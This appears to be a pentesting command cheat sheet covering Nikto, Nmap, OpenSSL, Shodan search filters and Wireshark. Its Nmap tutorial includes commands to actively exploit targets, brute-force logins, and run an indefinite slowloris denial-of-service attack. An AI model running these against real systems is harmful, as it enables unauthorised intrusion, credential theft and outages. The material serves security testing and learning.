████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ███╗ ██╗██╗██╗ ██╗████████╗ ██████╗
# ████╗ ██║██║██║ ██╔╝╚══██╔══╝██╔═══██╗
# ██╔██╗ ██║██║█████╔╝ ██║ ██║ ██║
# ██║╚██╗██║██║██╔═██╗ ██║ ██║ ██║
# ██║ ╚████║██║██║ ██╗ ██║ ╚██████╔╝
# ╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝
# To scan a particular host
perl nikto.pl -host [host IP/name]
# To scan a host on multiple ports (default = 80)
perl nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3]
# To scan a host and output fingerprinted information to a file
perl nikto.pl -host [host IP/name] -output [output_file]
# To use a proxy while scanning a host
perl nikto.pl -host [host IP/name] -useproxy [proxy address]
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ███╗ ██╗███╗ ███╗ █████╗ ██████╗
# ████╗ ██║████╗ ████║██╔══██╗██╔══██╗
# ██╔██╗ ██║██╔████╔██║███████║██████╔╝
# ██║╚██╗██║██║╚██╔╝██║██╔══██║██╔═══╝
# ██║ ╚████║██║ ╚═╝ ██║██║ ██║██║
# ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝
# NMAP is an essential tool in any hacker's arsenal. Originally written by Gordon Lyon aka Fydor, it's used to locate hosts and services and create a map of the network. NMAP has always been an incredibly powerful tool, but with it's newest release, they've really out done themselves. NMAP now comes equipped with a ton of new scripts you can use to do everything from DoSing targets to exploiting them (with written permission, of course). The scripts cover the following categories
# Auth: Use to test whether you can bypass authentication mechanism
# Broadcast: Use to find other hosts on the network and automatically add them to scanning que.
# Brute: Use for brute password guessing.
# Discovery: Use to discover more about the network.
# Dos: Use to test whether a target is vulnerable to DoS
# Exploit: Use to actively exploit a vulnerability
# Fuzzer: Use to test how server responds to unexpected or randomized fields in packets and determine other potential vulnerabilities
# Intrusive: Use to perform more intense scans that pose a much higher risk of being detected by admins.
# Malware: Use to test target for presence of malware
# Safe: Use to perform general network security scan that's less likely to alarm remote administrators
# Vuln: Use to find vulnerabilities on the target
# For this tutorial, I will show you how to scan a target for vulnerabilities, actively try and exploit any vulnerabilities, test whether the target is vulnerable to DoS, and then finally launch a DoS attack.
## Download NMAP ##
# Download nmap from https://nmap.org/download.html and follow the installation instructions for your particular Operating System. NMAP works easily on both Windows and Linux. After installing you will have NMAP and ZENMAP on your computer.
# ZENMAP and NMAP are the same thing except ZENMAP provides you with a graphical user interface. For the rest of this tutorial you can chose to either run NMAP from your command line, or launch ZENMAP and enter the commands in the GUI.
# Run NMAP ##
# Now that we've got NMAP installed, it's time to scan our target for vulnerabilities. As mentioned there is an entire category of scripts dedicated to finding vulnerabilities on a target. Invoking the following command will run all of the scripts against your target.
nmap -Pn --script vuln <target.com or ip> <enter>
# *I always throw a -Pn in there just in case the target blocks ping probes, although it's optional. After your scan completes, review NMAPs output to determine what vulnerabilities were found. It will list it's findings along with applicable CVEs and links to any exploits that exist in Offensive Security's Exploit Database.
# Use NMAP to Actively Exploit Detected Vulnerabilities ##
# As mentioned, you can also use NMAP's exploit script category to have NMAP actively exploit detected vulnerabilities by issuing the following command:
nmap --script exploit -Pn <target.com or ip> <enter>
# Use NMAP to Brute Force Passwords ##
# Nmap contains scripts for brute forcing dozens of protocols, including http-brute, oracle-brute, snmp-brute, etc. Use the following command to perform brute force attacks to guess authentication credentials of a remote server.
nmap --script brute -Pn <target.com or ip> <enter>
# Use NMAP to Test if Target Is Vulnerable to Dos ##
# Use the following command to check whether the target is vulnerable to DoS:
nmap --script dos -Pn <target.com or ip> <enter>
# This will tell you whether the target is vulnerable without actually launching a dos attack.
# Use NMAP to Perform DOS Attack
# Use the following command to perform an active DoS attack against a target for an indefinite period of time:
nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
# Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -A -T4 target
# As above but scans all TCP ports (takes a lot longer)
nmap -v -sS -p- -A -T4 target
# As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -sU -sS -p- -A -T4 target
# Search nmap scripts for keywords
ls /usr/share/nmap/scripts/* | grep ftp
# Single target scan:
nmap [target]
# Scan from a list of targets:
nmap -iL [list.txt]
# iPv6:
nmap -6 [target]
# OS detection:
nmap -O --osscan_guess [target]
# Save output to text file:
nmap -oN [output.txt] [target]
# Save output to xml file:
nmap -oX [output.xml] [target]
# Scan a specific port:
nmap -source-port [port] [target]
# Do an aggressive scan:
nmap -A [target]
# Speedup your scan:
# -n => disable ReverseDNS
# --min-rate=X => min X packets / sec
nmap -T5 --min-parallelism=50 -n --min-rate=300 [target]
# Traceroute:
nmap -traceroute [target]
# Ping scan only: -sP
# Don't ping: -PN <- Use full if a host don't reply to a ping.
# TCP SYN ping: -PS
# TCP ACK ping: -PA
# UDP ping: -PU
# ARP ping: -PR
# Example: Ping scan all machines on a class C network
nmap -sP 192.168.0.0/24
# Force TCP scan: -sT
# Force UDP scan: -sU
# Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 target
# Scan port for all available A records (useful when multiple A records are returned by the DNS server)
nmap --script resolveall --script-args newtargets,resolveall.hosts=[target] -p [port]
# Use some script:
nmap --script default,safe
# Loads the script in the default category, the banner script, and all .nse files in the directory /home/user/customscripts.
nmap --script default,banner,/home/user/customscripts
# Loads all scripts whose name starts with http-, such as http-auth and http-open-proxy.
nmap --script 'http-*'
# Loads every script except for those in the intrusive category.
nmap --script "not intrusive"
# Loads those scripts that are in both the default and safe categories.
nmap --script "default and safe"
# Loads scripts in the default, safe, or intrusive categories, except for those whose names start with http-.
nmap --script "(default or safe or intrusive) and not http-*"
# Discovert DHCP information on an interface
nmap --script broadcast-dhcp-discover -e eth0
# Scan for the heartbleed
# -pT:443 => Scan only port 443 with TCP (T:)
nmap -T5 --min-parallelism=50 -n --script "ssl-heartbleed" -pT:443 127.0.0.1
# Show all informations (debug mode)
nmap -d ...
#==============================#
# CMD nmap
#==============================##==============================#
nmap -iR 20 -sL -n|awk '{print $2}'|grep '^[0-9]'|uniq
# Random IP addresses
nmap -p22 -oG - $(ip addr | awk '/inet .*global/ {print $2}' | tr '\n' ' ') | awk '/22\/open/ {print $2}' | uniq
# Find all SSH Hosts - If you want to find all SSH enabled hosts in all subnets to which your computer is connected, you can use this oneliner
nmap --open -p T:22 192.168.1.0/24
# Scan your internal network for hosts listening on TCP port 22 (SSH protocol).
nmap -sP 192.168.1.0/24; arp-scan --localnet | grep "192.168.1.[0-9]* *ether"
# find all active IP addresses in a network I just added the args [arp-scan --localnet] which works for Debian users, because the package 'arp' has name 'arp-scan', and it doesn't works with the argument 'arp'.
# Scan a single IP address When firewall OFF/ON on target PC -> Syntax – nmap IP address/hostname
nmap 192.168.75.131
nmap google.com
# Boost up Your nmap Scan – using this command u can decrease scan time -> Syntax – nmap –F IP address
nmap –F google.com
# Scan multiple IP address or subnet A. scan a range of IP address -> Syntax – nmap IP address range
nmap 192.168.75.1-131
# Scan a range of IP address using a wildcard
nmap 192.168.75.*
# Scan an entire subnet
nmap 192.168.75.1/24
# scan turn on OS and version detection
nmap –O 192.168.75.131
# Scan all TCP port in target IP
nmap –sT 192.168.75.131
# Scan a firewall for security weakness -> Null scan – TCP Null Scan to fool a firewall to generate a response
nmap –sN 192.168.75.131
# Fin scan – TCP Fin scan to check firewall
nmap –sF 192.168.75.131
# TCP Xmas scan to check firewall
nmap –sX 192.168.75.131
# UDP Scan – Scan a host for UDP services. This scan is used to view open UDP port.
nmap –sU 192.168.75.131
# Scan for IP protocol – This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.
nmap –sO 192.168.75.131
# detect remote services (server / daemon) version numbers
nmap –sV 192.168.75.131
# Find out the most commonly used TCP ports using TCP SYN Scan -> Stealthy scan
nmap –sS 192.168.75.131
# Find out the most commonly used TCP ports using TCP connect scan
nmap –sT 192.168.75.131
# Find out the most commonly used TCP ports using TCP ACK scan
nmap –sA 192.168.75.131
# Find out the most commonly used TCP ports using TCP Window scan
nmap –sW 192.168.75.131
# Find out the most commonly used TCP ports using TCP Maimon scan
nmap – sM 192.168.75.131
# List Scan – this command is used tolist target to scan
nmap –sL 192.168.75.131
# Host Discovery or Ping Scan – Scan a network and find out which servers and devices are up and running
nmap –sP 192.168.75.0/24
# Scan a host when protected by the firewall
nmap –PN 192.168.75.1
# Ping sweep for network:
nmap -sn -PE <IP ADDRESS OR RANGE>
# Scan and show open ports:
nmap --open <IP ADDRESS OR RANGE>
# Determine open services:
nmap -sV <IP ADDRESS>
# Scan two common TCP ports, HTTP an HTTPS:
nmap -p 80,443 <IP ADRESS OR RANGE>
# Scan common UDP port, DNS:
nmap -SU -p 53 <IP ADDRESS OR RANGE>
# Scan UDP and TCP together, be verbose on a single host and include optional skip ping:
nmap -v -Pn -sU -sT -p U:53,111,137,T:21-25,80,139,8080 <IP ADDRESS>
# How can I write a linux bash script that tells me which computers are ON in my LAN ?
nmap -sn 192.168.1.60-70
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2009-04-09 20:13 BST
Host machine1.home (192.168.1.64) appears to be up.
Host machine2.home (192.168.1.65) appears to be up.
Nmap finished: 11 IP addresses (2 hosts up) scanned in 0.235 seconds
That said, if you want to write it yourself (which is fair enough), this is how I would do it:
nmap --open -p T:22 192.168.1.0/24
# Scan your internal network for hosts listening on TCP port 22 (SSH protocol).
nmap -sS www.example\.com
# Do a stealthy like port scan of your website http://www.example.com to see what ports are exposed.
# Nmap scan every interface that is assigned an IP
ifconfig -a | grep -Po '\b(?!255)(?:\d{1,3}\.){3}(?!255)\d{1,3}\b' | xargs nmap -A -p0-
# Explanation:
# ifconfig -a to output all interfaces, | grep -Po '\b(?!255)(?:\d{1,3}\.){3}(?!255)\d{1,3}\b' will search for 4 octets with up to three digits each, ignoring any leading or trailing 255. For my personal, and likely most local networks, this will exclude broadcast and netmask addresses without affecting host IPs. At this point, stdout holds any IP assigned to an interface, and will finally pipe to xargs, which supplies the IPs as arguments for nmap. Nmap then performs an OS detection, version detection, script, and traceroute scan on all 65536 ports of each assigned IP.
# Note: When using grep, -P is requrired to be able to interpret negative lookahead (?!) and non-capturing group (?:) brackets.
# Limitations:
# The regex epression will find both valid and non-valid IP addresses, e.g. 999.999.999.999, however invalid IPs are not an expected result of ifconfig -a. It is possible to correct this with a much longer regex expression, but not necessary in this case.
nmap -sP "$(ip -4 -o route get 1 | cut -d ' ' -f 7)"/24 | grep report | cut -d ' ' -f 5-
# Display live hosts on the network Displays live hosts on the same network as the local machine with their hostnames and IP addresses. This command is IPv6 and multiple network adapter safe and does not rely on awk or sed, however it requires the "nmap" package installed. Might not work on OSX. Example alias for shell startup file: alias livehosts='nmap -sP "$(ip -4 -o route get 1 | cut -d " " -f 7)"/24 | grep report | cut -d " " -f 5-' Show Sample Output:
# gateway.url (192.168.2.1)
# host1.mynetwork (192.168.2.123)
# host2.mynetwork (192.168.2.140)
# 192.168.2.147
# host3.mynetwork (192.168.2.148)
# 192.168.2.187
# 192.168.2.190
# host4.mynetwork (192.168.2.194)
nmap -p0-65535 192.168.1.254 -T5
# nmap fast scan all ports target
# Dump top 10 ports tcp/udp from nmap - To be used with other port scanners and or for help with iptables --dport 1000:2000 style expansion
nmap -oA derp --top-ports 10 localhost>/dev/null;grep 'services\=' derp.xml | sed -r 's/.*services\=\"(.*)(\"\/>)/\1/g'
# Sample output
# 7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157
# nmap get all active online ips from specific network - scan whole specific network for active online ips
nmap -n -sn 192.168.1.0/24 -oG - | awk '/Up$/{print $2}'
# Sample output
# 192.168.1.79
# 192.168.1.82
# ...
# 192.168.1.119
# 192.168.1.120
#==============================##==============================#
# CMD NMAP #
#==============================##==============================#
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ██████╗ ██████╗ ███████╗███╗ ██╗███████╗███████╗██╗
# ██╔═══██╗██╔══██╗██╔════╝████╗ ██║██╔════╝██╔════╝██║
# ██║ ██║██████╔╝█████╗ ██╔██╗ ██║███████╗███████╗██║
# ██║ ██║██╔═══╝ ██╔══╝ ██║╚██╗██║╚════██║╚════██║██║
# ╚██████╔╝██║ ███████╗██║ ╚████║███████║███████║███████╗
# ╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═══╝╚══════╝╚══════╝╚══════╝
# To create a 2048-bit private key:
openssl genrsa -out server.key 2048
# To create the Certificate Signing Request (CSR):
openssl req -new -key server.key -out server.csr
# To sign a certificate using a private key and CSR:
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
# (The above commands may be run in sequence to generate a self-signed SSL certificate.)
# To show certificate information for a certificate signing request
openssl req -text -noout -in server.csr
# To show certificate information for generated certificate
openssl x509 -text -noout -in server.crt
# To view certificate expiration:
echo | openssl s_client -connect <hostname>:443 2> /dev/null | \
awk '/-----BEGIN/,/END CERTIFICATE-----/' | \
openssl x509 -noout -enddate
# Generate Diffie-Hellman parameters:
openssl dhparam -outform PEM -out dhparams.pem 2048
#==============================#
# CMD OPENSSL
#==============================##==============================#
openssl s_client -connect smtp.example.net:25 -starttls smtp -quiet
openssl s_client -connect www.lxu.io:443 -crlf
GET / HTTP/1.0
Host: www.lxu.io
openssl s_client -connect imap.example.org:143 -starttls imap -quiet
depth=0 CN = imap.example.org
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = imap.example.org
verify return:1
. OK CAPABILITY completed
a1 login $user $pass
a1 OK LOGIN Ok.
a2 logout
* BYE Courier-IMAP server shutting down
a2 OK LOGOUT completed
openssl des3 -salt -in infile.txt -out encryptedfile.txt
# Encrypt a file with OpenSSL - Works on OS X, Linux, anywhere with OpenSSL installed: To encrypt a file
openssl des3 -d -salt -in encryptedfile.txt -out normalfile.txt
# To decrypt the file
##########################################################
# SMTP auth mit starttls auf der Kommandozeile testen
#------------------------------------------------------#
# Zuerst brauchen wir für auth plain den mime encoded String aus unseren Logindaten:
printf 'benutzername\0kontoname\0passwort' | mimencode
YmVudXR6ZXJuYW1lAGtvbnRvbmFtZQBwYXNzd30ydA==
# Dann hilft uns openssl bei der verschlüsselten Verbindung:
openssl s_client -connect lxu.io:25 -crlf -starttls smtp
# SMTP auth mit starttls auf der Kommandozeile testen
# Zuerst brauchen wir für auth plain den mime encoded String aus unseren Logindaten:
printf 'benutzername\0kontoname\0passwort' | mimencode
YmVudXR6ZXJuYW1lAGtvbnRvbmFtZQBwYXNzd30ydA==
# Dann hilft uns openssl bei der verschlüsselten Verbindung:
openssl s_client -connect lxu.io:25 -crlf -starttls smtp
# Die Ausgabe bezüglich Zertifikat des Servers ist umfangreich und wurde hier radikal gekürzt:
CONNECTED(00000003)
depth=0 C = AT, ......
.....
Verify return code: 18 (self signed certificate)
---
250 DSN
helo localhost.local
250 lxu.io
auth plain
334
YmVudXR6ZXJuYW1lAGtvbnRvbmFtZQBwYXNzd30ydA==
235 2.7.0 Authentication successful
quit
221 2.0.0 Bye
closed
##########################################################
# Encrypt Files in Linux
##############################
tar -czf - * | openssl enc -e -aes256 -out secured.tar.gz
enc – openssl command to encode with ciphers
-e – a enc command option to encrypt the input file, which in this case is the output of the tar command
-aes256 – the encryption cipher
-out – enc option used to specify the name of the out filename, secured.tar.gz
openssl enc -d -aes256 -in secured.tar.gz | tar xz -C test
-d – used to decrypt the files
-C – extract in subdirectory named test
# HowTo signrequest erzeugen und unterschreiben
# Request testen:
openssl req -in lxu.io_ssl_req_new.pem -text -verify -noout
# Unterschreiben:
openssl ca -in lxu.io_ssl_req_new.pem -notext -out servercert.pem
openssl ca -extensions v3_ca -in 20161116_asg1.csr -notext -out 20161116servercert_asg1.pem
rueben....
# Ergebnis testen:
openssl x509 -in newcerts/02.pem -text -noout
# Ergbnis convert PEM to P7B
openssl crl2pkcs7 -nocrl -certfile servercert_MSDBQSSL.pem -out servercert_MSDBQSSL.p7b -certfile lxu.ioProxyCert-v2.crt
openssl extract certificate privkey
openssl pkcs12 -in file.pfx -nocerts -out privateKey.pem
openssl pkcs12 -in file.pfx -clcerts -nokeys -out publicCert.cer
openssl rsa -in privateKey.pem -out privateKey_nopasswd.pem
openssl rand -base64 12
# Generate a random password quickly in CLI using openssl
openssl rsa -in server1.key -out server2.key
# Strip SSL Password - Remove password from SSL, stop Apache from asking for a password on startup.
openssl s_client -connect http://smtp.lxu.io:25 -starttls smtp
# If you used to use telnet or netcat to test protocols, but are stumped by SSL/TLS connections. Try using openssl s_client with --starttls and the name of the protocol.
openssl req -out CSR.csr -key privateKey.key -new
# Generate a certificate signing request (CSR) for an existing private key. CSR.csr MUST be exists before
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt
# Generate a self-signed certificate
openssl req -out CSR.csr -new -newkey rsa:2048 -nodes -keyout privateKey.key
# Generate a new private key and Certificate Signing Request. CSR.csr MUST be extist before !
openssl x509 -x509toreq -in certificate.crt -out CSR.csr -signkey privateKey.key
# Generate a certificate signing request based on an existing certificate. certificate.crt MUST be exists before !
#-----------------------------------------------------------------------///
# bash: openssl extract certificate privkey
openssl pkcs12 -in file.pfx -nocerts -out privateKey.pem
openssl pkcs12 -in file.pfx -clcerts -nokeys -out publicCert.cer
openssl rsa -in privateKey.pem -out privateKey_nopasswd.pem
# Concatenate multiple SSL certificate files to make one PEM file
files=("yourcert.crt" "provider.ca.pem") && for i in ${files[@]} ; do $(cat $i >> yourcert.pem && echo "" >> yourcert.pem) ; done
# Explanation: If you want to concat multiple files, you might end up with cat {a,b,c} >> yourcert.pem in a loop. But the problem is that it doesnt create new line after each cat. This script is for that matter. To use, e.g.:
cd /etc/ssl/certs
files=("yourcert.crt" "provider.ca.pem") && for i in ${files[@]} ; do $(cat $i >> yourcert.pem && echo "" >> yourcert.pem) ; done
# pretty print json block that has quotes escaped
echo 'json_here' | sed 's/\\//g' | jq .
# Download certificate chain from FTP
echo | openssl s_client -showcerts -connect ftp.domain.com:ftp -starttls ftp 2>/dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
# Download certificate from FTP
echo | openssl s_client -servername ftp.domain.com -connect ftp.domain.com:21 -starttls ftp 2>/dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
# List SAN domains for a certificate - List SAN Domains for a certificate
echo | openssl s_client -connect google.com:443 2>&1 | openssl x509 -noout -text | awk -F, -v OFS="\n" '/DNS:/{x=gsub(/ *DNS:/, ""); $1=$1; print $0}'
# Sample output
# *.google.com
# *.android.com
# *.appengine.google.com
# *.cloud.google.com
# ...
# youtubeeducation.com
# youtubekids.com
# yt.be
# Host cpu performance - Measure the cpu performance: In-case if the cpu is thermal throttling then you can find it using this command. Check the first line of the output. Example: Doing md5 for 3s on 16 size blocks: 11406892 md5's in 2.98s ? #(When cpu is not throttling) Doing md5 for 3s on 16 size blocks: 110692 md5's in 2.98s ?? #(When cpu is thermal throttling) Practical use case: Once we had cooling outage in data center which caused thermal throttling in some of the worker nodes. We used this tool to prove that some servers are not performing well because of the cpu thermal throttling.
openssl speed md5
# Sample output
# Doing md5 for 3s on 16 size blocks: 11406892 md5's in 2.98s
# Doing md5 for 3s on 64 size blocks: 8479926 md5's in 2.99s
# Doing md5 for 3s on 256 size blocks: 4800618 md5's in 2.99s
# Doing md5 for 3s on 1024 size blocks: 1719000 md5's in 2.98s
# Doing md5 for 3s on 8192 size blocks: 249448 md5's in 2.99s
#==============================##==============================#
# CMD OPENSSL #
#==============================##==============================#
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ███████╗██╗ ██╗ ██████╗ ██████╗ █████╗ ███╗ ██╗
# ██╔════╝██║ ██║██╔═══██╗██╔══██╗██╔══██╗████╗ ██║
# ███████╗███████║██║ ██║██║ ██║███████║██╔██╗ ██║
# ╚════██║██╔══██║██║ ██║██║ ██║██╔══██║██║╚██╗██║
# ███████║██║ ██║╚██████╔╝██████╔╝██║ ██║██║ ╚████║
# ╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝
# Filter IP range
net:<ip range>
# Filter port
port:<port>
# Filter location
city:"<city>" country:<country_code>
geo:<coords>
# Filter hostname
hostname:<hostname>
# Filter operating system
os:<operating system>
# Filter dates
# Acceptable formats are: day/month/year or day-month-year
before:<date>
after:<date>
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ██╗ ██╗██╗██████╗ ███████╗███████╗██╗ ██╗ █████╗ ██████╗ ██╗ ██╗
# ██║ ██║██║██╔══██╗██╔════╝██╔════╝██║ ██║██╔══██╗██╔══██╗██║ ██╔╝
# ██║ █╗ ██║██║██████╔╝█████╗ ███████╗███████║███████║██████╔╝█████╔╝
# ██║███╗██║██║██╔══██╗██╔══╝ ╚════██║██╔══██║██╔══██║██╔══██╗██╔═██╗
# ╚███╔███╔╝██║██║ ██║███████╗███████║██║ ██║██║ ██║██║ ██║██║ ██╗
# ╚══╝╚══╝ ╚═╝╚═╝ ╚═╝╚══════╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
# To start capturing packets on a specified interface
Capture>"Interfaces ...">[Select interface(s)]>Start
# To stop a running capture to analyze the packets
Capture>Stop
# To apply a filter from selected packets in a current or previous capture session
[Right click packet]>"Apply as filter">[Select options]
# To start a session that will only capture packets destined for your device
Capture>"Options...">[Uncheck "Use promiscuious mode on all interfaces"]>Start
# To view all packets of a TCP/UDP/SSL stream
[Right click packet]>"Follow <TCP/UDP/SSL> stream"
# To manage decryption keys to decrypt encrypted streams
View>"Wireless Toolbar" then
"Wireless Toolbar">"Decryption Keys..."
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░